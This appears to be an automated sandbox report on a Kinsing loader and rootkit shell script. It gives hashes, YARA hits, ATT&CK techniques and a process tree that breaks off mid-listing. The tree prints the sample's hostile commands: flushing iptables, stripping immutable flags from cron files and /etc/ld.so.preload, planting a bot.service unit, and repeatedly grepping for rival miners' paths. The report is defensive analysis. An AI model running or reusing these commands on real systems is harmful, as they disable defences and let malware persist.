kinsing | 5afcd6676866ec08eb69891ac9e85119df2253230400f36453dd77c12ab172cf

Analysis

max time kernel
150s
max time network
153s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
24/02/2025, 02:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5afcd6676866ec08eb69891ac9e85119df2253230400f36453dd77c12ab172cf.sh
Size

15KB
MD5

d2484b28c1e002017e8c2d44c93e39ed
SHA1

739c10e99c5e87c7303f8059280468d1e0bf0981
SHA256

5afcd6676866ec08eb69891ac9e85119df2253230400f36453dd77c12ab172cf
SHA512

cae0e8d861d5b380baba2ed819df7250db08e692cae327c0765b3fae46896ecf8483ac72789ded669e1fc4b2b53ca5aff96a67c00a450324b01bc30908250f45
SSDEEP

384:r5JxgzLuqlH2wx2vUaQa5/eN86704s80ooJQYgykWT4yCtvUsDjdWOoJw9:trgXux7YJDj8OoJw9

Score

10^/10

kinsing kinsing_rootkit defense_evasion discovery exection loader persistence privilege_escalation rootkit

Malware Config

Signatures

Kinsing
Kinsing is a loader written in Golang.
loader kinsing
Kinsing Rootkit
Rootkit reuses the publicly available BEURK rootkit.
rootkit kinsing_rootkit

Kinsing Rootkit payload 1 IoCs

resource	yara_rule
behavioral3/files/fstream-17.dat	family_elf_kinsing_rootkit

Kinsing family
kinsing

Kinsing payload 1 IoCs

resource	yara_rule
behavioral3/files/fstream-16.dat	family_elf_kinsing_loader

Kinsing_rootkit family
kinsing_rootkit

Modifies the dynamic linker configuration file 2 TTPs 1 IoCs

Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.

exection persistence privilege_escalation defense_evasion

Shared Modules

T1129

Dynamic Linker Hijacking

T1574.006

description	ioc	Process
File opened for modification	/etc/ld.so.preload	5afcd6676866ec08eb69891ac9e85119df2253230400f36453dd77c12ab172cf.sh

File and Directory Permissions Modification 1 TTPs 8 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1702	chmod
1707	chmod
1709	chmod
1715	chmod
1716	chmod
1688	chmod
1691	chmod
1700	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/etc/data/kinsing	1717	5afcd6676866ec08eb69891ac9e85119df2253230400f36453dd77c12ab172cf.sh

Flushes firewall rules 1 TTPs 1 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

defense_evasion

Disable or Modify System Firewall

T1562.004

pid	Process
719	iptables

Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs

Abuse sudo or cached sudo credentials to execute code.

privilege_escalation defense_evasion

Sudo and Sudo Caching

T1548.003

pid	Process
1436	sudo

Attempts to change immutable files 50 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
714	chattr
1540	xargs
1597	sed
1618	sed
1620	xargs
1655	xargs
1666	xargs
1677	xargs
1445	uname
1593	xargs
1596	xargs
1603	sed
1614	xargs
1624	sed
1484	xargs
1594	sed
1605	xargs
1612	sed
1469	xargs
1546	xargs
1599	xargs
1600	sed
1617	xargs
1623	xargs
1474	xargs
1527	xargs
1558	xargs
1626	xargs
715	chattr
1495	xargs
1500	xargs
1522	xargs
1590	xargs
1602	xargs
1682	xargs
1479	xargs
1490	xargs
1505	xargs
1510	xargs
1515	xargs
1552	xargs
1606	sed
1608	xargs
707	chattr
1534	xargs
1591	sed
1615	sed
1621	sed
1638	xargs
1643	xargs

Enumerates running processes
Discovers information about currently running processes on the system

Modifies systemd 2 TTPs 1 IoCs

Adds/ modifies systemd service files. Likely to achieve persistence.

persistence privilege_escalation

XDG Autostart Entries

T1547.013

Systemd Service

T1543.002

description	ioc	Process
File opened for modification	/lib/systemd/system/bot.service	5afcd6676866ec08eb69891ac9e85119df2253230400f36453dd77c12ab172cf.sh

Reads CPU attributes 1 TTPs 64 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	exim4
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	exim4
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill

Enumerates kernel/hardware configuration 1 TTPs 1 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl

Process Discovery 1 TTPs 12 IoCs

Adversaries may try to discover information about running processes.

discovery

Process Discovery

T1057

pid	Process
1523	ps
1634	ps
1491	ps
1511	ps
1518	ps
1586	ps
1639	ps
1678	ps
1486	ps
1496	ps
1501	ps
1506	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/3/cmdline	pkill
File opened for reading	/proc/113/status	pkill
File opened for reading	/proc/313/status	pkill
File opened for reading	/proc/113/status	pkill
File opened for reading	/proc/9/status	pkill
File opened for reading	/proc/1682/stat	ps
File opened for reading	/proc/23/cmdline	ps
File opened for reading	/proc/1513/cmdline	ps
File opened for reading	/proc/72/cmdline	pkill
File opened for reading	/proc/74/cmdline	pkill
File opened for reading	/proc/372/cmdline	pkill
File opened for reading	/proc/12/cmdline	pkill
File opened for reading	/proc/1/cmdline	pkill
File opened for reading	/proc/383/cmdline	pkill
File opened for reading	/proc/114/cmdline	pkill
File opened for reading	/proc/17/status	pkill
File opened for reading	/proc/3/cmdline	ps
File opened for reading	/proc/104/cmdline	pkill
File opened for reading	/proc/2/status	pkill
File opened for reading	/proc/310/status	pkill
File opened for reading	/proc/20/status	pkill
File opened for reading	/proc/1481/stat	ps
File opened for reading	/proc/22/stat	ps
File opened for reading	/proc/2/status	pkill
File opened for reading	/proc/11/status	pkill
File opened for reading	/proc/1569/cmdline	pkill
File opened for reading	/proc/383/cmdline	pkill
File opened for reading	/proc/81/stat	ps
File opened for reading	/proc/11/cmdline	pkill
File opened for reading	/proc/77/status	ps
File opened for reading	/proc/11/cmdline	pkill
File opened for reading	/proc/402/status	pkill
File opened for reading	/proc/710/cmdline	pkill
File opened for reading	/proc/706/cmdline	ps
File opened for reading	/proc/533/status	pkill
File opened for reading	/proc/706/cmdline	pkill
File opened for reading	/proc/10/cmdline	ps
File opened for reading	/proc/114/cmdline	pkill
File opened for reading	/proc/7/cmdline	pkill
File opened for reading	/proc/12/status	pkill
File opened for reading	/proc/145/cmdline	pkill
File opened for reading	/proc/81/cmdline	pkill
File opened for reading	/proc/74/status	pkill
File opened for reading	/proc/21/status	pkill
File opened for reading	/proc/685/status	pkill
File opened for reading	/proc/10/status	pkill
File opened for reading	/proc/3/status	ps
File opened for reading	/proc/145/status	pkill
File opened for reading	/proc/81/cmdline	ps
File opened for reading	/proc/74/stat	ps
File opened for reading	/proc/14/status	pkill
File opened for reading	/proc/149/stat	ps
File opened for reading	/proc/10/status	ps
File opened for reading	/proc/stat	ps
File opened for reading	/proc/223/status	pkill
File opened for reading	/proc/149/cmdline	pkill
File opened for reading	/proc/70/status	pkill
File opened for reading	/proc/1631/cmdline	pkill
File opened for reading	/proc/685/status	pkill
File opened for reading	/proc/73/cmdline	ps
File opened for reading	/proc/sys/kernel/osrelease	pkill
File opened for reading	/proc/5/status	pkill
File opened for reading	/proc/71/cmdline	pkill
File opened for reading	/proc/11/status	pkill

System Network Configuration Discovery 1 TTPs 1 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1379	ls

/tmp/5afcd6676866ec08eb69891ac9e85119df2253230400f36453dd77c12ab172cf.sh
/tmp/5afcd6676866ec08eb69891ac9e85119df2253230400f36453dd77c12ab172cf.sh
1⤵
- Modifies the dynamic linker configuration file
- Executes dropped EXE
- Modifies systemd
PID:706
- /usr/bin/chattr
  chattr -i /etc/ld.so.preload
  2⤵
  - Attempts to change immutable files
  PID:707
- /bin/rm
  rm -f /etc/ld.so.preload
  2⤵
  PID:709
- /usr/bin/chattr
  chattr -R -ia /var/spool/cron
  2⤵
  - Attempts to change immutable files
  PID:714
- /usr/bin/chattr
  chattr -ia /etc/crontab
  2⤵
  - Attempts to change immutable files
  PID:715
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:719
- /bin/grep
  grep exe
  2⤵
  PID:727
- /bin/ls
  ls -latrh /proc/1
  2⤵
  PID:726
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:732
- /bin/grep
  grep exe
  2⤵
  PID:736
- /bin/ls
  ls -latrh /proc/10
  2⤵
  PID:735
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:741
- /bin/grep
  grep exe
  2⤵
  PID:746
- /bin/ls
  ls -latrh /proc/104
  2⤵
  PID:745
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:749
- /bin/grep
  grep exe
  2⤵
  PID:752
- /bin/ls
  ls -latrh /proc/11
  2⤵
  PID:751
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:756
- /bin/ls
  ls -latrh /proc/113
  2⤵
  PID:758
- /bin/grep
  grep exe
  2⤵
  PID:759
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:762
- /bin/ls
  ls -latrh /proc/114
  2⤵
  PID:765
- /bin/grep
  grep exe
  2⤵
  PID:766
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:769
- /bin/grep
  grep exe
  2⤵
  PID:772
- /bin/ls
  ls -latrh /proc/12
  2⤵
  PID:771
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:775
- /bin/grep
  grep exe
  2⤵
  PID:778
- /bin/ls
  ls -latrh /proc/13
  2⤵
  PID:777
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:780
- /bin/grep
  grep exe
  2⤵
  PID:784
- /bin/ls
  ls -latrh /proc/14
  2⤵
  PID:783
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:786
- /bin/grep
  grep exe
  2⤵
  PID:789
- /bin/ls
  ls -latrh /proc/145
  2⤵
  PID:788
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:791
- /bin/ls
  ls -latrh /proc/146
  2⤵
  PID:793
- /bin/grep
  grep exe
  2⤵
  PID:794
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:796
- /bin/grep
  grep exe
  2⤵
  PID:799
- /bin/ls
  ls -latrh /proc/149
  2⤵
  PID:798
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:801
- /bin/ls
  ls -latrh /proc/15
  2⤵
  PID:803
- /bin/grep
  grep exe
  2⤵
  PID:804
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:806
- /bin/grep
  grep exe
  2⤵
  PID:809
- /bin/ls
  ls -latrh /proc/16
  2⤵
  PID:808
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:811
- /bin/ls
  ls -latrh /proc/165
  2⤵
  PID:813
- /bin/grep
  grep exe
  2⤵
  PID:814
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:816
- /bin/ls
  ls -latrh /proc/17
  2⤵
  PID:818
- /bin/grep
  grep exe
  2⤵
  PID:819
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:821
- /bin/grep
  grep exe
  2⤵
  PID:824
- /bin/ls
  ls -latrh /proc/18
  2⤵
  PID:823
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:826
- /bin/grep
  grep exe
  2⤵
  PID:829
- /bin/ls
  ls -latrh /proc/19
  2⤵
  PID:828
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:831
- /bin/grep
  grep exe
  2⤵
  PID:834
- /bin/ls
  ls -latrh /proc/2
  2⤵
  PID:833
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:836
- /bin/grep
  grep exe
  2⤵
  PID:839
- /bin/ls
  ls -latrh /proc/20
  2⤵
  PID:838
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:841
- /bin/ls
  ls -latrh /proc/21
  2⤵
  PID:843
- /bin/grep
  grep exe
  2⤵
  PID:844
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:846
- /bin/grep
  grep exe
  2⤵
  PID:849
- /bin/ls
  ls -latrh /proc/22
  2⤵
  PID:848
- /bin/grep
